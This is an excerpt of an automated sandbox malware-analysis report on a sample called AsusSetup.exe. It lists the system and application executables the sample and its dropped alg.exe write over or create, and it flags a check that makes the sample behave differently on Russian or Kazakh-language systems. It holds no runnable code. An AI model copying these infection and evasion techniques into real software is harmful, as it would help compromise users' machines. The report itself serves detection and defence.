Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Contains functionality to behave differently if execute on a Russian/Kazak computer
Source: C:\Users\user\Desktop\AsusSetup.exeCode function: 0_2_01FD5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 0_2_01FD5346
Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00BE5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 7_2_00BE5346
Source: C:\Windows\System32\FXSSVC.exeCode function: 10_2_00D25346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 10_2_00D25346
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_00995346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 11_2_00995346
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C05346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_00C05346
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
